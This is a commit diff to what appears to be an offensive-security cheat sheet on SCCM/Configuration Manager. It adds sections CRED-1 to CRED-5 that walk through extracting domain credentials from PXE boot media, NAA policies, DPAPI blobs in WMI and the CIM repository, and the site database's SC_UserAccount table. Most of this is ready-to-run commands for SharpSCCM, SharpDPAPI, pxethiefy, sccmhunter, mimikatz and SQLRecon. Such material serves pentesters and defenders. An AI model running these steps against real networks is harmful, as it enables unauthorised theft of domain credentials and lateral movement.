SCCM - CRED1 to CRED5

pull/6/head
Swissky 2024-03-19 21:54:19 +01:00
parent 7257e153b8
commit 1cee3b6738
1 changed files with 141 additions and 31 deletions

View File

@ -63,36 +63,6 @@
```
## Network Access Accounts
> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
On the machine
* Find SCCM blob
```ps1
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
```
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
```ps1
.\SharpDPAPI.exe SCCM
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
```
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
```ps1
Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
ConvertFrom-SddlString ""
```
From a remote machine.
* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
```ps1
python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
```
## SCCM Shares
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
@ -105,6 +75,145 @@ From a remote machine.
```
## Configuration Manager
### CRED-1 Retrieve credentials via PXE boot media
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
Requirements:
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
* PXE-enabled distribution point
Exploitation:
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
```ps1
sudo python3 pxethiefy.py explore -i eth0
```
* [MWR-CyberSec/PXEThief](https://github.com/MWR-CyberSec/PXEThief)
### CRED-2 Request a policy containing credentials
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
Requirements:
* PKI certificates are not required for client authentication
* Domain accounts credential
Exploitation:
Create a machine or compromise an existing one, then request policies such as `NAAConfig`
```ps1
SharpSCCM get secrets -u <username-machine-$> -p <password>
SharpSCCM get naa
```
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
* [Misconfiguration-Manager - CRED-3](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-3/cred-3_description.md)
**Requirements**:
* Local administrator privileges on an SCCM client
**Exploitation**:
* Find SCCM blob
```ps1
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
```
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244)
```ps1
$str = "060...F2DAF"
$bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt
```
* Using [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
```ps1
.\SharpSCCM.exe local secrets -m wmi
```
From a remote machine.
* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
```ps1
python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
```
### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
**Requirements**:
* Local administrator privileges on an SCCM client
**Exploitation**:
* Search the database using `SharpDPAPI`
```ps1
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
```
* Search the database using `SharpSCCM`
```ps1
.\SharpSCCM.exe local secrets -m disk
```
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
```ps1
Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
ConvertFrom-SddlString ""
```
### CRED-5 Extract and decrypt the SC_UserAccount table from the site database
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
**Requirements**:
* Site database access
* Primary site server access
* Access to the private key used for encryption
**Exploitation**:
* [gentilkiwi/mimikatz](https://twitter.com/gentilkiwi/status/1392204021461569537)
```ps1
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
```
* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon), only if the site server and database are hosted on the same system
```ps1
SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
```
* SQLRecon + [xpn/sccmdecryptpoc.cs](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1)
```ps1
SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
sccmdecryptpoc.exe 0C010000080[...]5D6F0
```
## References
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
@ -113,3 +222,4 @@ From a remote machine.
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)